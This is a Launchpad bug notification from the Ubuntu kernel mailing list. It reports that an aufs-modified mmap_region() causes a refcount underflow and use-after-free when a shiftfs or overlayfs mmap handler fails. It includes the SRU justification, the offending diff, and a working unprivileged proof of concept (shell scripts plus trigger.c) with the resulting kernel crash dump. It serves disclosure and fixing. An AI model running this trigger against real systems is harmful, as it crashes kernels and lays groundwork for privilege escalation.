** Tags added: patch

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1850994

Title:
  ubuntu-aufs-modified mmap_region() breaks refcounting in
  overlayfs/shiftfs error path

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Disco:
  In Progress
Status in linux source package in Eoan:
  In Progress
Status in linux source package in Focal:
  In Progress

Bug description:
  SRU Justification

  Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap
  handlers. On error the original value is not restored, and the
  reference is put for the file to which vm_file points. On upstream
  kernels this is not an issue, as no callers dereference vm_file
  dereference vm_file following after call_mmap() returns an error.
  However, the aufs patchs change mmap_region() to replace the fput()
  using a local variable with vma_fput(), which will fput() vm_file,
  leading to a refcount underflow.

  Fix: Restore the original vma_file value on error.

  Test Case: See below.

  Regression Potential: Minimal. As stated above, other callers of
  call_mmap() do not dereference vma->vm_file when it returns an error,
  and the one which does is fixed by these patches.

  Notes: Supported kernels prior to disco are not affected as overlayfs
  did not support mmap until 4.19, and shiftfs was not present in Ubuntu
  kernels before disco. The issue is mitigated for overlayfs by another
  bug which is preventing unprivileged mounting; a patch for this issue
  will be sent separately.

  ---

  Tested on 19.10.

  Ubuntu's aufs kernel patch includes the following change (which I 
interestingly
  can't see in the AUFS code at
  https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):

  ==================================================================
  +#define vma_fput(vma)                  vma_do_fput(vma, __func__, __LINE__)
  [...]
  @@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned 
long addr,
          return addr;

   unmap_and_free_vma:
  +       vma_fput(vma);
          vma->vm_file = NULL;
  -       fput(file);

          /* Undo any partial mapping done by a device driver. */
          unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
  [...]
  +void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
  +{
  +       struct file *f = vma->vm_file, *pr = vma->vm_prfile;
  +
  +       prfile_trace(f, pr, func, line, __func__);
  +       fput(f);
  +       if (f && pr)
  +               fput(pr);
  +}
  ==================================================================

  This means that in the case where call_mmap() returns an error to 
mmap_region(),
  fput() will be called on the current value of vma->vm_file instead of the 
saved
  file pointer. This matters if the ->mmap() handler replaces ->vm_file before
  returning an error code.

  overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
  see ovl_mmap() and shiftfs_mmap().

  To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
  FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes 
fuse_file_mmap()
  to bail out with -ENODEV if MAP_SHARED is set.

  I would have used overlayfs instead, but there is an unrelated bug that makes 
it
  impossible to mount overlayfs inside a user namespace:
  Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
  and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
  already has the same value. This causes mount_too_revealing() to bail out 
with a
  WARN_ONCE().

  Note that this PoC requires the "bindfs" package and should be executed with
  "slub_debug" in the kernel commandline to get a clear crash.

  ==================================================================
  Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0

  user-Standard-PC-Q35-ICH9-2009 login: user
  Password:
  Last login: Fr Nov  1 23:45:36 CET 2019 on ttyS0
  Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)

   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage

  0 updates can be installed immediately.
  0 of these updates are security updates.

  user@user-Standard-PC-Q35-ICH9-2009:~$ ls
  aufs-mmap  Documents  Music     Public     trace.dat
  Desktop    Downloads  Pictures  Templates  Videos
  user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
  BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic 
root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug 
quiet splash vt.handoff=7
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
  #!/bin/sh
  sync
  unshare -mUr ./run2.sh
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
  #!/bin/bash
  set -e

  mount -t tmpfs none /tmp
  mkdir -p /tmp/{lower,middle,upper}
  touch /tmp/lower/foo
  # mount some random FUSE filesystem with direct_io,
  # doesn't really matter what it does as long as
  # there's a file in it.
  # (this is just to get some filesystem that can
  # easily be convinced to throw errors from f_op->mmap)
  bindfs -o direct_io /tmp/lower /tmp/middle
  # use the FUSE filesystem to back shiftfs.
  # overlayfs would also work if SB_I_NOSUID and
  # SB_I_USERNS_VISIBLE weren't defined to the same
  # value...
  mount -t shiftfs -o mark /tmp/middle /tmp/upper
  mount|grep shift
  gcc -o trigger trigger.c -Wall
  ./trigger
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
  #include <fcntl.h>
  #include <err.h>
  #include <unistd.h>
  #include <sys/mman.h>
  #include <stdio.h>

  int main(void) {
    int foofd = open("/tmp/upper/foo", O_RDONLY);
    if (foofd == -1) err(1, "open foofd");
    void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    if (badmap == MAP_FAILED) {
      perror("badmap");
    } else {
      errx(1, "badmap worked???");
    }
    sleep(1);
    mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  }
  user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
  /tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
  badmap: No such device
  [   72.101721] general protection fault: 0000 [#1] SMP PTI
  [   72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic 
#20-Ubuntu
  [   72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 
1.12.0-1 04/01/2014
  [   72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.189705] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.193073] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  [   72.202815] Call Trace:
  [   72.203712]  mmap_region+0x417/0x670
  [   72.204868]  do_mmap+0x3a8/0x580
  [   72.205939]  vm_mmap_pgoff+0xcb/0x120
  [   72.207954]  ksys_mmap_pgoff+0x1ca/0x2a0
  [   72.210078]  __x64_sys_mmap+0x33/0x40
  [   72.211327]  do_syscall_64+0x5a/0x130
  [   72.212538]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
  [   72.214177] RIP: 0033:0x7faa3ecc7af6
  [   72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 
89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 
f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
  [   72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 
0000000000000009
  [   72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 
00007faa3ecc7af6
  [   72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 
0000000000000000
  [   72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 
0000000000000000
  [   72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 
0000556248213100
  [   72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 
0000000000000000
  [   72.237681] Modules linked in: shiftfs intel_rapl_msr 
snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core 
snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common 
crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 
crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw 
snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm 
fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc 
ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid 
virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci 
virtio_blk
  [   72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
  [   72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
  [   72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
  [   72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
  [   72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 
7800000000000000
  [   72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: 
ffff9c1cc48b5900
  [   72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 
0000000000000000
  [   72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: 
ffff9c1cf1ae5790
  [   72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: 
ffff9c1cf7209740
  [   72.284048] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) 
knlGS:0000000000000000
  [   72.287161] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  [   72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 
0000000000360ee0
  [   72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
  [   72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400
  ==================================================================

  Faulting code:

  0000000F  55                push rbp
  00000010  4889E5            mov rbp,rsp
  00000013  4157              push r15
  00000015  4156              push r14
  00000017  4155              push r13
  00000019  4154              push r12
  0000001B  488B87C8000000    mov rax,[rdi+0xc8]
  00000022  4C8B6810          mov r13,[rax+0x10]
  00000026  498B4528          mov rax,[r13+0x28]
  0000002A  4883786000        cmp qword [rax+0x60],byte +0x0     <<<< GPF HERE
  0000002F  0F8497000000      jz near 0xcc
  00000035  4989FC            mov r12,rdi
  00000038  4989F6            mov r14,rsi

  As you can see, the poison value 6b6b6b6b6b6b6b6b is being
  dereferenced.

  This bug is subject to a 90 day disclosure deadline. After 90 days elapse
  or a patch has been made broadly available (whichever is earlier), the bug
  report will become visible to the public.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1850994/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to